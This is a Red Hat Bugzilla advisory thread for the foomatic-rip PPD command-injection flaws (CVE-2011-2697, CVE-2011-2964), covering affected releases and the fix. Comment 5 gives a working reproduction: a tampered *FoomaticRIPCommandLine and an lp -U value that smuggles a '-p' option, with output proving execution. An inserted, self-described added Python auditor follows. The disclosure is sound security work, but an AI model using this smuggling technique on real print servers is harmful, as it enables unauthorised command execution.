Bug 721001 - (CVE-2011-2697) CVE-2011-2697 foomatic: Improper sanitization of command line option in foomatic-rip
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All, OS: Linux
Priority: medium, Severity: medium
Assigned To: Red Hat Product Security
Whiteboard: public=20110607,reported=20110713,sou...
Keywords: Security
Depends On: 725631 725632 725633 833897
Blocks: 721067
Reported: 2011-07-13 10:18 EDT by Jan Lieskovsky
Modified: 2012-06-20 10:07 EDT (History)
Doc Type: Bug Fix
Last Closed: 2011-08-01 12:00:55 EDT

Attachments

Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) (patch, 8.53 KB), 2011-07-13 10:24 EDT, Jan Lieskovsky
Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) (patch, 14.05 KB), 2011-07-13 10:25 EDT, Jan Lieskovsky
ppd containing cupsFilter (application/x-gzip, 3.35 KB), 2011-07-26 02:47 EDT, Huzaifa S. Sidhpurwala

Description Jan Lieskovsky 2011-07-13 10:18:58 EDT
It was found that the foomatic-rip universal print filter did not properly sanitize the content of the "files to be printed" command line argument prior to performing the print job. A remote attacker could provide a specially-crafted PostScript Printer Description (PPD) file and trick a local user into printing it, which, once performed, could lead to arbitrary code execution with the privileges of the user running the foomatic-rip tool.

References:
[1] https://bugzilla.novell.com/show_bug.cgi?id=698451
[2] http://www.openwall.com/lists/oss-security/2011/07/13/3
    (CVE Request)

Proposed patch against the foomatic-rip C-source code:
[3] https://bugzilla.novell.com/show_bug.cgi?id=698451#c24

Proposed patch against the foomatic-rip Perl script:
[4] https://bugzilla.novell.com/show_bug.cgi?id=698451#c25
Comment 1 Jan Lieskovsky 2011-07-13 10:24:15 EDT
Created attachment 512673 [details]
Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) patch
Comment 2 Jan Lieskovsky 2011-07-13 10:25:09 EDT
Created attachment 512674 [details]
Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) patch
Comment 3 Jan Lieskovsky 2011-07-13 10:26:29 EDT
This issue affects the versions of the foomatic package, as shipped with Red Hat Enterprise Linux 4, 5, and 6.

--

This issue affects the versions of the foomatic package as shipped with Fedora releases 14 and 15. Please schedule an update.
Comment 4 Jan Lieskovsky 2011-07-13 10:28:14 EDT
Created foomatic tracking bugs for this issue

Affects: fedora-all [bug 721008]
Comment 5 Jan Lieskovsky 2011-07-13 10:37:46 EDT
Further detail from Novell bugzilla [1] on how to reproduce the issue
(the scenario would need to be modified a bit, though, to apply to the foomatic-rip versions shipped across Red Hat products):
==============================================================================

How to reproduce with foomatic-rip:

1.
Set up a queue which uses foomatic-rip
i.e. use a PPD which has an "*cupsFilter: ... foomatic-rip" entry:

# lpadmin -p testy2 -v file:/dev/null \
  -P /usr/share/cups/model/OpenPrintingPPDs/ghostscript/Generic-PCL_5c_Printer.ljet4.ppd.gz \
  -E

If you don't have openSUSE 11.4 the Generic-PCL_5c_Printer.ljet4.ppd.gz
is located in /usr/share/cups/model/Generic/PCL_5c_Printer-ljet4.ppd.gz

2.
Get the PPD as normal user:

$ wget http://localhost:631/printers/testy2.ppd
...
2011-06-07 12:38:59 (795 MB/s) - `testy2.ppd' saved [13829/13829]

3.
Modify the PPD as normal user:

Change the *FoomaticRIPCommandLine: entry (up to the *End line)
as one likes, e.g. to this single line (without the *End line):
*FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out"

4.
Print a dummy job to find out the current job id as normal user:

$ echo Hello | lp -d testy2
request id is testy2-111

5.
Print the malicious job as normal user:

$ lp -d testy -U'-p/var/spool/cups/d00112-001' \
 -o document-format=text/plain testy2.ppd
request id is testy-112

6.
Verify that the FoomaticRIPCommandLine was actually executed:

# ls -l /tmp/testy2.out
-rw------- 1 lp lp 57 Jun  7 12:40 /tmp/testy2.out

# cat /tmp/testy2.out
openSUSE 11.4 (x86_64)
VERSION = 11.4
CODENAME = Celadon

==============================================================================

And one more correction regarding point 5:

How to reproduce with foomatic-rip:
...
5.
Print the malicious job as normal user:

$ lp -d testy2 -U'-p/var/spool/cups/d00112-001' \
 -o document-format=text/plain testy2.ppd
request id is testy2-112
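A defensive check for the condition this report describes and the comment above reproduces, written as an added example (not code from foomatic, CUPS, Red Hat or the Novell report): it parses the *cupsFilter and *FoomaticRIPCommandLine entries of a PPD, flags a command line whose program is not in an assumed allow-list of RIP programs, and flags a PPD that carries such an entry while living outside an assumed set of administrator-controlled directories. The allow-list, the trusted directories, the function names and the two sample PPD fragments are constructed for illustration; the tampered fragment reuses the command line from the reproduction above.

```python
"""Audit a PPD for a *FoomaticRIPCommandLine that foomatic-rip would execute.

Added example for this report, not code from foomatic, CUPS or Red Hat.
The allow-list, the trusted directories and the sample PPDs are assumptions
constructed for illustration.
"""
import re
import shlex
from pathlib import PurePosixPath

# Assumption: programs a legitimate *FoomaticRIPCommandLine is expected to start with.
ALLOWED_RIP_PROGRAMS = {"gs", "pdftops", "pdftoraster", "pnm2ppa", "foo2zjs-wrapper"}

# Assumption: only PPDs an administrator installed under these directories are trusted.
TRUSTED_PPD_DIRS = ("/etc/cups/ppd", "/usr/share/cups/model", "/usr/share/ppd")

# PPD string values may span lines; a multi-line value is closed by a quote followed by *End.
_ENTRY_RE = re.compile(r'^\*(FoomaticRIPCommandLine|cupsFilter):\s*"(.*?)"', re.S | re.M)


def parse_ppd_entries(ppd_text):
    """Return {keyword: [values]} for the two keywords that route a job through foomatic-rip."""
    entries = {}
    for key, value in _ENTRY_RE.findall(ppd_text):
        # Collapse the line breaks of a multi-line value into single spaces.
        entries.setdefault(key, []).append(" ".join(value.split()))
    return entries


def is_trusted_path(ppd_path):
    """True only for an absolute path, free of '..', below one of TRUSTED_PPD_DIRS."""
    path = PurePosixPath(ppd_path)
    if not path.is_absolute() or ".." in path.parts:
        return False
    return any(path.is_relative_to(d) for d in TRUSTED_PPD_DIRS)


def audit_ppd(ppd_text, ppd_path):
    """Return a list of findings; an empty list means nothing looked wrong."""
    findings = []
    cmds = parse_ppd_entries(ppd_text).get("FoomaticRIPCommandLine", [])
    for cmd in cmds:
        try:
            argv = shlex.split(cmd)
        except ValueError as exc:
            findings.append(f"unparseable FoomaticRIPCommandLine ({exc}): {cmd!r}")
            continue
        # The first word is what foomatic-rip's shell would run; compare its basename.
        if argv and PurePosixPath(argv[0]).name not in ALLOWED_RIP_PROGRAMS:
            findings.append(f"FoomaticRIPCommandLine runs non-RIP program {argv[0]!r}")
    # A command line is only acceptable in a PPD the administrator put in place.
    if cmds and not is_trusted_path(ppd_path):
        findings.append(
            f"PPD {ppd_path!r} carries a FoomaticRIPCommandLine but is outside the trusted directories"
        )
    return findings


# Constructed sample: a benign fragment with the multi-line value form used in real PPDs.
BENIGN_PPD = '''*PPD-Adobe: "4.3"
*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dPARANOIDSAFER -dNOPAUSE -sDEVICE=ljet4
-sOutputFile=- -"
*End
'''

# Constructed sample: the queue's PPD after a user replaced the entry as in the reproduction.
TAMPERED_PPD = '''*PPD-Adobe: "4.3"
*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out"
'''

if __name__ == "__main__":
    for name, text, path in (("benign", BENIGN_PPD, "/etc/cups/ppd/testy2.ppd"),
                             ("tampered", TAMPERED_PPD, "/home/user/testy2.ppd")):
        print(name, audit_ppd(text, path) or ["ok"])
```

The location check is the part that matters for this bug: the reproduction works because foomatic-rip honours a PPD handed to it on the command line, so a PPD the user wrote is treated the same as the one the administrator installed for the queue. The program allow-list is a second, independent signal that catches a tampered PPD even when it has been copied into a trusted directory.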
Comment 10 Jan Lieskovsky 2011-07-18 08:38:40 EDT
The CVE identifier of CVE-2011-2697 has been assigned to this issue:
http://www.openwall.com/lists/oss-security/2011/07/18/3
Comment 12 Huzaifa S. Sidhpurwala 2011-07-26 02:47:58 EDT
Created attachment 515184 [details]
ppd containing cupsFilter
Comment 15 Vincent Danen 2011-07-29 17:51:36 EDT
MITRE has assigned two CVE names here:

Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2697 to
the following vulnerability:

Name: CVE-2011-2697
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2697
Assigned: 20110711
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomatic-rip-hplip in HP Linux Imaging and Printing (HPLIP) 3.11.5
allows remote attackers to execute arbitrary code via a crafted
*FoomaticRIPCommandLine field in a .ppd file.


Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2964 to
the following vulnerability:

Name: CVE-2011-2964
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2964
Assigned: 20110729
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomaticrip.c in foomatic-rip in foomatic-filters in Foomatic 4.0.6
allows remote attackers to execute arbitrary code via a crafted
*FoomaticRIPCommandLine field in a .ppd file, a different
vulnerability than CVE-2011-2697.
Comment 16 Huzaifa S. Sidhpurwala 2011-07-31 22:55:24 EDT
Looking at the description of the CVEs from above:

CVE-2011-2697 is for the perl version in foomatic 3.x:
Affects: rhel-4 , rhel-5

CVE-2011-2964 is for the C version in foomatic 4.x:
Affects: rhel-6, Fedora
Comment 17 Huzaifa S. Sidhpurwala 2011-07-31 23:25:16 EDT
Keeping this bug for the perl issue.
Comment 18 errata-xmlrpc 2011-08-01 11:56:24 EDT
This issue has been addressed in following products:

  Red Hat Enterprise Linux 4
  Red Hat Enterprise Linux 5

Via RHSA-2011:1109 https://rhn.redhat.com/errata/RHSA-2011-1109.html
